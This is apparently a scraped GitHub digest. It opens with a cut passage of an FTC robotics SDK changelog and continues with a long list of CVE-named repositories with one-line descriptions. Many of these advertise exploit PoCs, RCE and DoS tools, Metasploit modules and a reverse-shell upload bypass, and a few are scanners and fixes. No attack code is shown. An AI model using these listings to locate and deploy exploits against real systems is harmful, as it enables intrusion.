VuforiaTrackableDefaultListener. Fixed a few blocks. Added type checking to new blocks. Updated to latest blockly. Added default variable blocks to navigation and matrix blocks. Fixed toolbox entry for openGLMatrix_rotation_withAxesArgs. When user downloads Blocks-generated op mode, only the .blk file is downloaded. When user uploads Blocks-generated op mode (.blk file), Javascript code is auto generated. Added DbgLog support. Added logging when a blocks file is read/written. Fixed bug to properly render blocks even if missing devices from configuration file. Added support for additional characters (not just alphanumeric) for the block file names (for download and upload). Added support for OpMode flavor (“Autonomous” or “TeleOp”) and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 (“Replace .. paths”). Remove Servo Glitches when robot stopped. if user hits “Cancels” when editing a configuration file, clears the unsaved changes and reverts to original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by watch dog function). Added ability to transfer log from the controller. Fixed inconsistency for AngularVelocity Limit unbounded growth of data for telemetry. If user does not call telemetry.update() for LinearOpMode in a timely manner, data added for telemetry might get lost if size limit is exceeded. Version 2.35 (released on 16.10.06) Blockly programming mode - Removed unnecesary idle() call from blocks for new project. Version 2.30 (released on 16.10.05) Blockly programming mode: Mechanism added to save Blockly op modes from Programming Mode Server onto local device To avoid clutter, blocks are displayed in categorized folders Added support for DigitalChannel Added support for ModernRoboticsI2cCompassSensor Added support for ModernRoboticsI2cRangeSensor Added support for VoltageSensor Added support for AnalogInput Added support for AnalogOutput Fix for CompassSensor setMode block Vuforia Fix deadlock / make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close security loophole). Fix for autonomous 30 second timer bug (where timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after op mode is stopped (with enforced 2 second safety timeout). Fix to avoid reading i2c twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added digital I/O sample. Cleaned up device names in sample op modes to be consistent with Pushbot guide. Fix to allow use of IrSeekerSensorV3. Version 2.20 (released on 16.09.08) Support for Modern Robotics Compass Sensor. Support for Modern Robotics Range Sensor. Revise device names for Pushbot templates to match the names used in Pushbot guide. Fixed bug so that IrSeekerSensorV3 device is accessible as IrSeekerSensor in hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller. Version 2.10 (released on 16.09.03) Support for Adafruit IMU. Improvements to ModernRoboticsI2cGyro class Block on reset of z axis. isCalibrating() returns true while gyro is calibration. Updated sample gyro program. Blockly enhancements support for android.graphics.Color. added support for ElapsedTime. improved look and legibility of blocks. support for compass sensor. support for ultrasonic sensor. support for IrSeeker. support for LED. support for color sensor. support for CRServo prompt user to configure robot before using programming mode. Provides ability to disable audio cues. various bug fixes and improvements. Version 2.00 (released on 16.08.19) This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important - we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. ContinuousRotationServo class has been added to the FTC SDK. Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map. Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. Prototype Blockly Programming Mode has been added to FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a Javascript enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). Vuforia Computer Vision SDK integrated into FTC SDK. Users can use sample vision targets to get localization information on a standard FTC field. Project structure has been reorganized so that there is now a TeamCode package that users can use to place their local/custom Op Modes into this package. Inspection function has been integrated into the FTC Robot Controller and Driver Station Apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into FTC SDK. Swap mechanism added to FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter in the configuration info for the two devices). Fix mechanism added to all user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must for a telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (both in the LinearOpMode and OpMode types) and to abort the run, then auto recover has been improved/implemented. Fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users. Release 16.07.08 For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x. Release 16.03.30 For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved/updated. Release 16.03.09 Changes made to make the FTC SDK synchronous (significant change!) waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read/write thread. Methods are synchronous. For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For legacy module (NXT compatible), user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability/robustness during ESD event. Changes made to make code thread safe. Debug keystore added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops for example). Firmware version information for Modern Robotics modules are now logged. Changes made to improve USB comm reliability and robustness. Added support for voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto stop capabilities for op modes. A LinearOpMode class will stop when the statements in runOpMode() are complete. User does not have to push the stop button on the driver station. If an op mode is stopped by the driver station, but there is a run away/uninterruptible thread persisting, the app will log an error message then force itself to crash to stop the runaway thread. Driver Station UI modified to display lowest measured voltage below current voltage (12V battery). Driver Station UI modified to have color background for current voltage (green=good, yellow=caution, red=danger, extremely low voltage). javadoc improved (edits and additional classes). Added app build time to About activity for driver station and robot controller apps. Display local IP addresses on Driver Station About activity. Added I2cDeviceSynchImpl. Added I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate i2c address in software for the Modern Robotics gyro. Release 16.02.09 Improved battery checker feature so that voltage values get refreshed regularly (every 250 msec) on Driver Station (DS) user interface. Improved software so that Robot Controller (RC) is much more resilient and “self-healing” to USB disconnects: If user attempts to start/restart RC with one or more module missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC & DS will display warnings,and robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected the RC will auto detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (identifies the type of module that’s missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled. Note that teams might have to readjust their light threshold values in their op modes. On DS user interface, gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in About screen on RC and DS apps. Incorporated a display filter on pairing screen to filter out devices that don’t use the “-“ format. This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue on with a blank (“”) device name that would disrupt WiFi Direct Pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps Prevent Wifi from entering power saving mode removed unused import from driver station Corrrected "Dead zone" joystick code. LED.getDeviceName and .getConnectionInfo() return null apps check for ROBOCOL_VERSION mismatch Fix for Telemetry also has off-by-one errors in its data string sizing / short size limitations error User telemetry output is sorted. added formatting variants to DbgLog and RobotLog APIs code modified to allow for a long list of op mode names. changes to improve thread safety of RobocolDatagramSocket Fix for "missing hardware leaves robot controller disconnected from driver station" error fix for "fast tapping of Init/Start causes problems" (toast is now only instantiated on UI thread). added some log statements for thread life cycle. moved gamepad reset logic inside of initActiveOpMode() for robustness changes made to mitigate risk of race conditions on public methods. changes to try and flag when WiFi Direct name contains non-printable characters. fix to correct race condition between .run() and .close() in ReadWriteRunnableStandard. updated FTDI driver made ReadWriteRunnableStanard interface public. fixed off-by-one errors in Command constructor moved specific hardware implmentations into their own package. moved specific gamepad implemnatations to the hardware library. changed LICENSE file to new BSD version. fixed race condition when shutting down Modern Robotics USB devices. methods in the ColorSensor classes have been synchronized. corrected isBusy() status to reflect end of motion. corrected "back" button keycode. the notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added Support for Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about Z axis) Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages More descriptive error messages for exceptions in user code. Updated DcMotor API Enable read mode on new address in setI2cAddress Fix so that driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix USB initializtion race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed bug so that USB device is closed if event loop teardown method was not called. Fixed timer UI issue Fixed duplicate name UI bug (Legacy Module configuration). Fixed race condition in EventLoopManager. Fix to keep references stable when updating gamepad. For legacy Matrix motor/servo controllers removed necessity of appending "Motor" and "Servo" to controller names. Updated HT color sensor driver to use constants from ModernRoboticsUsbLegacyModule class. Updated MR color sensor driver to use constants from ModernRoboticsUsbDeviceInterfaceModule class. Correctly handle I2C Address change in all color sensors Updated/cleaned up op modes. Updated comments in LinearI2cAddressChange.java example op mode. Replaced the calls to "setChannelMode" with "setMode" (to match the new of the DcMotor method). Removed K9AutoTime.java op mode. Added MRGyroTest.java op mode (demonstrates how to use MR Gyro Sensor). Added MRRGBExample.java op mode (demonstrates how to use MR Color Sensor). Added HTRGBExample.java op mode (demonstrates how to use HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for Legacy Matrix 9.6V motor/servo controller. Cleaned up build.gradle file. Minor UI and bug fixes for driver station and robot controller apps. Throws error if Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an "INIT" button on driver station. The init() and loop() methods are now required (i.e., need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use the LinearOpMode mode to create a linear (not event driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The API for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.** : [chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020](https://api.github.com/repos/chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020) create time: 2021-03-08T11:34:11Z

**Injeccion sql** : [Sharker3312/CVE-2019-12384](https://api.github.com/repos/Sharker3312/CVE-2019-12384) create time: 2021-03-10T01:37:15Z

**Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)** : [ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE](https://api.github.com/repos/ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE) create time: 2021-03-17T12:07:12Z

**CutePHP Cute News 2.1.2 RCE PoC** : [thewhiteh4t/cve-2019-11447](https://api.github.com/repos/thewhiteh4t/cve-2019-11447) create time: 2021-03-18T09:24:29Z

**There was a flaw in the WordPress plugin, Email Subscribers & Newsletters before 4.3.1, that allowed SQL statements to be passed to the database in the hash parameter (a blind SQL injection vulnerability).** : [jerrylewis9/CVE-2019-20361-EXPLOIT](https://api.github.com/repos/jerrylewis9/CVE-2019-20361-EXPLOIT) create time: 2021-03-18T00:22:05Z

** double-free bug in WhatsApp exploit poc** : [dorkerdevil/CVE-2019-11932](https://api.github.com/repos/dorkerdevil/CVE-2019-11932) create time: 2019-10-03T09:26:24Z

**CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15** : [mai-lang-chai/Middleware-Vulnerability-detection](https://api.github.com/repos/mai-lang-chai/Middleware-Vulnerability-detection) create time: 2019-09-08T01:13:59Z

**Bypass bludit mitigation login form and upload malicious to call a rev shell ** : [jayngng/bludit-CVE-2019-17240](https://api.github.com/repos/jayngng/bludit-CVE-2019-17240) create time: 2021-03-22T01:50:43Z

**A Test and Debug Tool for ASPEED BMC AHB Interfaces** : [amboar/cve-2019-6260](https://api.github.com/repos/amboar/cve-2019-6260) create time: 2019-02-21T22:49:53Z

**CVE-2019-0708扫描** : [SurrealSky/CVE20190708SCAN](https://api.github.com/repos/SurrealSky/CVE20190708SCAN) create time: 2021-03-23T03:28:30Z

**None** : [DXY0411/CVE-2019-1020010](https://api.github.com/repos/DXY0411/CVE-2019-1020010) create time: 2021-03-16T17:13:32Z

**CVE2019-2017 POC** : [grmono/CVE2019-2017_POC](https://api.github.com/repos/grmono/CVE2019-2017_POC) create time: 2019-08-27T20:14:45Z

**this is a local scanner for cve-2019-0708** : [ORCA666/CVE-2019--0708-SCANNER](https://api.github.com/repos/ORCA666/CVE-2019--0708-SCANNER) create time: 2021-03-25T07:05:38Z

**Vulnerability analysis and PoC for the Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (RCE)** : [jaiguptanick/CVE-2019-0232](https://api.github.com/repos/jaiguptanick/CVE-2019-0232) create time: 2021-03-25T20:09:54Z

**Another implementation for linux privilege escalation exploit via snap(d) (CVE-2019-7304)** : [bendalisoftpro/snap_priv_esc](https://api.github.com/repos/bendalisoftpro/snap_priv_esc) create time: 2021-03-28T23:17:27Z

**CVE-2019-12840** : [zAbuQasem/CVE-2019-12840](https://api.github.com/repos/zAbuQasem/CVE-2019-12840) create time: 2021-03-30T17:32:30Z

**CVE-2019-0708批量检测** : [Pa55w0rd/CVE-2019-0708](https://api.github.com/repos/Pa55w0rd/CVE-2019-0708) create time: 2019-06-11T05:38:26Z

**详解 k8gege的SharePoint RCE exploit cve-2019-0604-exp.py的代码,动手制作自己的payload** : [boxhg/CVE-2019-0604](https://api.github.com/repos/boxhg/CVE-2019-0604) create time: 2019-12-10T02:39:57Z

**Viber Messenger remote account reset exploit** : [thesamarkand2/CVE-2019-18800](https://api.github.com/repos/thesamarkand2/CVE-2019-18800) create time: 2021-04-04T06:19:22Z

**Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340** : [zhzyker/exphub](https://api.github.com/repos/zhzyker/exphub) create time: 2020-04-01T09:33:35Z

**Reproduction of iOS 11 bug CVE-2018-4110** : [bencompton/ios11-cookie-set-expire-issue](https://api.github.com/repos/bencompton/ios11-cookie-set-expire-issue) create time: 2017-10-03T18:09:30Z

**CVE-2018-4343: Proof-of-concept for a use-after-free in the GSSCred daemon on macOS and iOS.** : [bazad/gsscred-move-uaf](https://api.github.com/repos/bazad/gsscred-move-uaf) create time: 2017-12-08T09:15:37Z

**2018年1月2日 (CVE-2017-5753 和 CVE-2017-5715) "幽灵" Spectre 漏洞利用** : [poilynx/spectre-attack-example](https://api.github.com/repos/poilynx/spectre-attack-example) create time: 2018-01-05T05:51:34Z

**CVE-2018-4331: Exploit for a race condition in the GSSCred system service on iOS 11.2.** : [bazad/gsscred-race](https://api.github.com/repos/bazad/gsscred-race) create time: 2017-12-16T08:48:08Z

**Exploit the vulnerability to execute the calculator** : [zldww2011/CVE-2018-0802_POC](https://api.github.com/repos/zldww2011/CVE-2018-0802_POC) create time: 2018-01-11T09:16:32Z

**PoC for CVE-2018-0802 And CVE-2017-11882** : [Ridter/RTF_11882_0802](https://api.github.com/repos/Ridter/RTF_11882_0802) create time: 2018-01-12T11:38:33Z

**None** : [likescam/CVE-2018-0802_CVE-2017-11882](https://api.github.com/repos/likescam/CVE-2018-0802_CVE-2017-11882) create time: 2018-01-16T05:49:01Z

**None** : [Palvinder-Singh/PS_CVE2018-0802](https://api.github.com/repos/Palvinder-Singh/PS_CVE2018-0802) create time: 2018-01-22T07:45:06Z

**The Demo for CVE-2018-1000006** : [CHYbeta/CVE-2018-1000006-DEMO](https://api.github.com/repos/CHYbeta/CVE-2018-1000006-DEMO) create time: 2018-01-25T02:38:44Z

**None** : [zarou3/https-github.com-cveaswaran-ELSpring2018](https://api.github.com/repos/zarou3/https-github.com-cveaswaran-ELSpring2018) create time: 2018-01-25T14:23:38Z

**[CVE-2018-6407 & CVE-2018-6408] Conceptronic IPCam Administration panel CSRF and Denial of Service** : [dreadlocked/ConceptronicIPCam_MultipleVulnerabilities](https://api.github.com/repos/dreadlocked/ConceptronicIPCam_MultipleVulnerabilities) create time: 2018-01-29T20:36:54Z

**None** : [huzhenghui/Test-7-2-1-PHP-CVE-2018-5711](https://api.github.com/repos/huzhenghui/Test-7-2-1-PHP-CVE-2018-5711) create time: 2018-02-01T06:00:14Z

**None** : [huzhenghui/Test-7-2-0-PHP-CVE-2018-5711](https://api.github.com/repos/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711) create time: 2018-02-01T04:21:13Z

**ERPScan Public POC for CVE-2018-2636** : [erpscanteam/CVE-2018-2636](https://api.github.com/repos/erpscanteam/CVE-2018-2636) create time: 2018-01-29T15:16:02Z

**[CVE-2018-6479] Netwave IP Camera server vulnerable to Denial of Service via one single huge POST request.** : [dreadlocked/netwave-dosvulnerability](https://api.github.com/repos/dreadlocked/netwave-dosvulnerability) create time: 2018-01-31T16:38:48Z

**CVE-2017-4878 Samples - http://blog.talosintelligence.com/2018/02/group-123-goes-wild.html** : [brianwrf/CVE-2017-4878-Samples](https://api.github.com/repos/brianwrf/CVE-2017-4878-Samples) create time: 2018-02-05T05:01:40Z

**CVE-2018-3608 Trend_Micro_CVE** : [ZhiyuanWang-Chengdu-Qihoo360/Trend_Micro_POC](https://api.github.com/repos/ZhiyuanWang-Chengdu-Qihoo360/Trend_Micro_POC) create time: 2018-02-05T12:22:28Z

**Apache RewriteRule to mitigate potential DoS attack via Wordpress wp-admin/load-scripts.php file** : [yolabingo/wordpress-fix-cve-2018-6389](https://api.github.com/repos/yolabingo/wordpress-fix-cve-2018-6389) create time: 2018-02-06T01:43:33Z

**CVE-2018-6389 Exploit In WordPress DoS ** : [WazeHell/CVE-2018-6389](https://api.github.com/repos/WazeHell/CVE-2018-6389) create time: 2018-02-06T15:16:03Z

**WordPress DoS (CVE-2018-6389)** : [knqyf263/CVE-2018-6389](https://api.github.com/repos/knqyf263/CVE-2018-6389) create time: 2018-02-07T00:20:57Z

**A ModSecurity ruleset for detecting potential attacks using CVE-2018-6389** : [rastating/modsecurity-cve-2018-6389](https://api.github.com/repos/rastating/modsecurity-cve-2018-6389) create time: 2018-02-06T22:51:21Z

**None** : [1337g/CVE-2018-0101-DOS-POC](https://api.github.com/repos/1337g/CVE-2018-0101-DOS-POC) create time: 2018-02-07T16:25:59Z

**None** : [mdsecactivebreach/CVE-2018-4878](https://api.github.com/repos/mdsecactivebreach/CVE-2018-4878) create time: 2018-02-09T13:30:46Z

**Metasploit module for WordPress DOS load-scripts.php CVE-2018-638** : [dsfau/wordpress-CVE-2018-6389](https://api.github.com/repos/dsfau/wordpress-CVE-2018-6389) create time: 2018-02-09T14:37:44Z

**Aggressor Script to just launch IE driveby for CVE-2018-4878** : [hybridious/CVE-2018-4878](https://api.github.com/repos/hybridious/CVE-2018-4878) create time: 2018-02-09T22:25:03Z

**glibc getcwd() local privilege escalation compiled binaries** : [0x00-0x00/CVE-2018-1000001](https://api.github.com/repos/0x00-0x00/CVE-2018-1000001) create time: 2018-02-07T17:34:24Z

**Aggressor Script to launch IE driveby for CVE-2018-4878** : [vysecurity/CVE-2018-4878](https://api.github.com/repos/vysecurity/CVE-2018-4878) create time: 2018-02-10T09:30:18Z

**MikroTik RouterOS Denial of Service Vulnerability** : [Nat-Lab/CVE-2018-5951](https://api.github.com/repos/Nat-Lab/CVE-2018-5951) create time: 2018-01-25T01:40:02Z

**Joomla!, Second Order SQL Injection** : [knqyf263/CVE-2018-6376](https://api.github.com/repos/knqyf263/CVE-2018-6376) create time: 2018-02-12T05:02:52Z

**Patch Wordpress DOS breach (CVE-2018-6389) in PHP** : [JulienGadanho/cve-2018-6389-php-patcher](https://api.github.com/repos/JulienGadanho/cve-2018-6389-php-patcher) create time: 2018-02-07T13:22:31Z

**CVE-2018-6791 Troubleshooting** : [rarar0/KDE_Vuln](https://api.github.com/repos/rarar0/KDE_Vuln) create time: 2018-02-12T21:21:29Z

**This is the original PoC of CVE-2018-7211** : [c3r34lk1ll3r/CVE-2018-7211-PoC](https://api.github.com/repos/c3r34lk1ll3r/CVE-2018-7211-PoC) create time: 2018-02-18T10:47:00Z

**Global Fix for Wordpress CVE-2018-6389** : [Jetserver/CVE-2018-6389-FIX](https://api.github.com/repos/Jetserver/CVE-2018-6389-FIX) create time: 2018-02-15T14:00:14Z

**CVE-2018-4878 样本** : [KathodeN/CVE-2018-4878](https://api.github.com/repos/KathodeN/CVE-2018-4878) create time: 2018-02-23T19:24:40Z

**CVE-2018-7197 Write up** : [Alyssa-o-Herrera/CVE-2018-7197](https://api.github.com/repos/Alyssa-o-Herrera/CVE-2018-7197) create time: 2018-02-23T22:06:51Z

**None** : [knqyf263/CVE-2018-1304](https://api.github.com/repos/knqyf263/CVE-2018-1304) create time: 2018-02-24T06:45:21Z

**Proof of Concept of vunerability CVE-2018-6389 on Wordpress 4.9.2** : [thechrono13/PoC---CVE-2018-6389](https://api.github.com/repos/thechrono13/PoC---CVE-2018-6389) create time: 2018-02-25T22:06:05Z

**None** : [BlackRouter/cve-2018-6389](https://api.github.com/repos/BlackRouter/cve-2018-6389) create time: 2018-02-26T10:45:27Z

**A PoC for CVE-2018-7250** : [Elvin9/SecDrvPoolLeak](https://api.github.com/repos/Elvin9/SecDrvPoolLeak) create time: 2018-02-21T20:47:39Z

**PoC Exploit for CVE-2018-0802 (and optionally CVE-2017-11882)** : [rxwx/CVE-2018-0802](https://api.github.com/repos/rxwx/CVE-2018-0802) create time: 2018-01-11T09:43:46Z

**A PoC for CVE-2018-7249** : [Elvin9/NotSecDrv](https://api.github.com/repos/Elvin9/NotSecDrv) create time: 2018-02-21T20:31:09Z

**CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.** : [bazad/x18-leak](https://api.github.com/repos/bazad/x18-leak) create time: 2018-02-27T00:58:39Z

**CVE-2018-6389 WordPress Core - 'load-scripts.php' Denial of Service <= 4.9.4** : [JavierOlmedo/wordpress-cve-2018-6389](https://api.github.com/repos/JavierOlmedo/wordpress-cve-2018-6389) create time: 2018-03-01T20:19:14Z

**Joomla - Component Google Map Landkarten <= 4.2.3 - SQL Injection** : [JavierOlmedo/joomla-cve-2018-6396](https://api.github.com/repos/JavierOlmedo/joomla-cve-2018-6396) create time: 2018-03-02T21:46:28Z

**None** : [thariyarox/tomcat_CVE-2018-1304_testing](https://api.github.com/repos/thariyarox/tomcat_CVE-2018-1304_testing) create time: 2018-03-08T10:12:22Z

**WordPress <= 4.9.4 - Application Denial of Service (DoS) | CVE2018-6389 | Vulnerability | Exploit | Attack** : [Palvinder-Singh/CVE2018-6389](https://api.github.com/repos/Palvinder-Singh/CVE2018-6389) create time: 2018-03-08T10:42:22Z

**Exploit iOS 11.2.x by ZIMPERIUM and semi-completed by me. Sandbox escapes on CVE-2018-4087. ** : [joedaguy/Exploit11.2](https://api.github.com/repos/joedaguy/Exploit11.2) create time: 2018-03-08T18:04:31Z

**Tries to exploit a WordPress vulnerability (CVE-2018-6389) which can be used to cause a Denial of Service.** : [m3ssap0/wordpress_cve-2018-6389](https://api.github.com/repos/m3ssap0/wordpress_cve-2018-6389) create time: 2018-03-04T13:33:15Z

**Apache Tomcat 安全绕过漏洞 Poc** : [Pa55w0rd/CVE-2018-1305](https://api.github.com/repos/Pa55w0rd/CVE-2018-1305) create time: 2018-04-11T01:37:58Z

**YZMCMS v3.7最新版xss漏洞 CVE-2018-8078** : [AlwaysHereFight/YZMCMSxss](https://api.github.com/repos/AlwaysHereFight/YZMCMSxss) create time: 2018-03-09T07:56:56Z

**cve-2018-8108** : [zlgxzswjy/BUI-select-xss](https://api.github.com/repos/zlgxzswjy/BUI-select-xss) create time: 2018-03-14T04:32:01Z

**PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM** : [erpscanteam/CVE-2018-2380](https://api.github.com/repos/erpscanteam/CVE-2018-2380) create time: 2018-03-14T09:20:21Z

**None** : [H3llozy/CVE-2018-4879](https://api.github.com/repos/H3llozy/CVE-2018-4879) create time: 2018-03-16T04:04:55Z

**crash poc & Leak info PoC** : [bigric3/CVE-2018-4901](https://api.github.com/repos/bigric3/CVE-2018-4901) create time: 2018-03-19T07:27:53Z

**Cleaned, scraped data of all 2,341 CISCE schools, primarily in India, in 2018. Data scraped from: http://www.cisce.org/locate-search.aspx?country=0&state=0&dist=0&city=0&location=&schooltype=&cve=&isc=&icse=&schoolclassi=&school=&search=locate** : [deedy/cisce_schools_data](https://api.github.com/repos/deedy/cisce_schools_data) create time: 2018-03-20T05:36:05Z

**Demo for https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8970** : [tiran/CVE-2018-8970](https://api.github.com/repos/tiran/CVE-2018-8970) create time: 2018-03-25T11:22:47Z

** PoC Exploit for CVE-2018-8820** : [hateshape/frevvomapexec](https://api.github.com/repos/hateshape/frevvomapexec) create time: 2018-03-27T16:09:46Z

**None** : [acole76/cve-2018-6574](https://api.github.com/repos/acole76/cve-2018-6574) create time: 2018-04-02T03:34:29Z

**D-Link DSL-3782 Code Execution (Proof of Concept)** : [SECFORCE/CVE-2018-8941](https://api.github.com/repos/SECFORCE/CVE-2018-8941) create time: 2018-04-03T21:22:34Z

**None** : [lucad93/CVE-2018-3810](https://api.github.com/repos/lucad93/CVE-2018-3810) create time: 2018-03-29T14:04:11Z

**WolfCMS-v0.8.3.1 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6890** : [pradeepjairamani/WolfCMS-XSS-POC](https://api.github.com/repos/pradeepjairamani/WolfCMS-XSS-POC) create time: 2018-02-11T12:43:41Z

**Typo3 -v9.1.0 Persistent Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6905** : [pradeepjairamani/TYPO3-XSS-POC](https://api.github.com/repos/pradeepjairamani/TYPO3-XSS-POC) create time: 2018-04-08T06:34:34Z

**Spring messaging STOMP protocol RCE** : [CaledoniaProject/CVE-2018-1270](https://api.github.com/repos/CaledoniaProject/CVE-2018-1270) create time: 2018-04-07T00:14:33Z

**None** : [genxor/CVE-2018-1270_EXP](https://api.github.com/repos/genxor/CVE-2018-1270_EXP) create time: 2018-04-12T09:54:34Z

**Drupal 0day Remote PHP Code Execution (Perl)** : [dr-iman/CVE-2018-7600-Drupal-0day-RCE](https://api.github.com/repos/dr-iman/CVE-2018-7600-Drupal-0day-RCE) create time: 2018-04-14T09:02:54Z

**PoC for CVE-2018-7600 Drupal SA-CORE-2018-002 (Drupalgeddon 2).** : [dwisiswant0/CVE-2018-7600](https://api.github.com/repos/dwisiswant0/CVE-2018-7600) create time: 2018-04-14T18:26:26Z

**MSF exploit module for Drupalgeddon 2 (CVE-2018-7600 / SA-CORE-2018-002)** : [jirojo2/drupalgeddon2](https://api.github.com/repos/jirojo2/drupalgeddon2) create time: 2018-04-14T12:26:10Z

**Testing and exploitation tool for Drupalgeddon 2 (CVE-2018-7600)** : [sl4cky/CVE-2018-7600](https://api.github.com/repos/sl4cky/CVE-2018-7600) create time: 2018-04-15T12:01:41Z

**Tool to check for CVE-2018-7600 vulnerability on several URLS** : [sl4cky/CVE-2018-7600-Masschecker](https://api.github.com/repos/sl4cky/CVE-2018-7600-Masschecker) create time: 2018-04-15T14:56:35Z

**CVE-2018-6546-Exploit** : [securifera/CVE-2018-6546-Exploit](https://api.github.com/repos/securifera/CVE-2018-6546-Exploit) create time: 2018-04-15T21:42:20Z

**CVE-2018-2628** : [forlin/CVE-2018-2628](https://api.github.com/repos/forlin/CVE-2018-2628) create time: 2018-04-18T02:56:39Z

**CVE-2018-7600 Drupal RCE** : [g0rx/CVE-2018-7600-Drupal-RCE](https://api.github.com/repos/g0rx/CVE-2018-7600-Drupal-RCE) create time: 2018-03-30T08:52:54Z

**CVE-2018-2628** : [skydarker/CVE-2018-2628](https://api.github.com/repos/skydarker/CVE-2018-2628) create time: 2018-04-18T10:50:09Z

